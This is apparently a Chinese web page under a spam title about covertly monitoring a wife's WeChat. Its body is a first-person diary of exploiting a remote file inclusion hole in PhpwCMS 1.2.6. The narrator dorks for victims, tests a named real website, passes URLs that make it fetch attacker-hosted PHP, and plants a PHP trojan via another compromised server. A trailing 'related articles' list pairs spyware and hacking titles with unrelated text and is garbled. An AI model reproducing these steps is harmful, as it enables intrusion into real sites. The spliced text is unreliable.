监控老婆微信和通话(怎么控制老婆微信聊天)
最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
文件中的$spaw_root的没有过滤的情况下,包含’**class/lang.class.php’。具体的代码公告中没给出来。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件。
二、学习的之一天
马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的。看来这次发了,这次国外的wenshell肯定是一大堆了。呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测,当然http://www.baidu.com/class/lang.class.php是不存在的,这时页面显示如图一所示,提示没有找到页面。这表明了这个网站存在文件包含漏洞,象这样的有漏洞的网站随便点击一个就是。
检测出有文件包含漏洞
现在开始利用这个漏洞,在我的支持asp网站根目录建一个class的目录,在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候,提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell,浏览的时候还是出现找不到文件的问题。
三、学习的第二天
去搜索的发现有漏洞的网站变得比较少了,大部分的网站都被漏洞补了,还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉,还有机会学习。我在无意中得到了jsp的wenshell,试着写了一个php文件,在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。
在webshell里面建一个class的文件夹,然后在class目录里面上传一个lang.class.php空文件,在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。
php环境信息
编辑lang.class.php的文件,先写了一个phpspy。但是登陆webshell的后,页面转到其他的页面。还是先传一可以上传的文件的马儿吧,传了一个国外的php木马,木马的功能很的大,浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。
相关文章
养成类游戏营销产品剖析(三):如何进行产品规划
编辑导语:养成类游戏营销产物如今极端火爆,用户纷纷着迷于养本钱身所选的主角的满意感,而且建造出对应了局的攻略。跟着养成类游戏市场的竞争日益剧烈,应该如何举办产物筹划才气使游戏吸引更多的用户呢?我们来看...
什么是官方旗舰店(解说旗舰店和官方店的区别)
如今很多人都喜爱在互联网上选购衣服及其食材,尤其是在购买衣服的情况下,会发觉旗靓店里边会搞出大型商场相同的字眼。那麼,旗靓店和专卖店一样吗?和天猫店一样吗?很感兴趣的盆友一起来了解一下。 一般来...
什么软件可以查询老公微信聊天记录
随着宝宝的成长,宝宝从吃母乳都需要辅食的过程父母就需要给宝宝准备宝宝餐具桌椅等。让宝宝坐在餐椅里,解决了宝宝哭闹不肯定吃饭饭问题,那么宝宝餐椅桌什么时候开始用比较好呢,宝宝餐椅有什么好处。下面友谊长存...
求内涵段子黑客网站,模仿黑客软件,黑客破解qq密码2017
ATM包含两个首要的部分:cabinet(柜子)和safe(安全部分)。 Cabinet也便是ATM的主体部分含有ATM计算机,这是与网络设备、读卡器、键盘、现金出口等设备相连的。 这部分是没有阐明维...
欧诗漫洗面奶适合年龄(欧诗漫官网代理价格)
洁面乳做为每一个精致女孩务必有着的物品,日常的耗费也较为大,因此 追上逢年过节特惠的情况下,我恨不能囤上一几十支只洁面乳。而且目前许多国货品牌也做得越变越好,尤其是在其中一些洁面乳的性价比高彻底不输日...
香港逗留10天怎么办(大陆人取得香港居留权)
在我国的旅游业的发展中,中国香港是很多人第一次度假旅游的到达站。这一真实的奢侈品商城每日都是有很多人来参观考察。2018年,mainland China赴港游人达5100人次,占2018年入关游人数...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!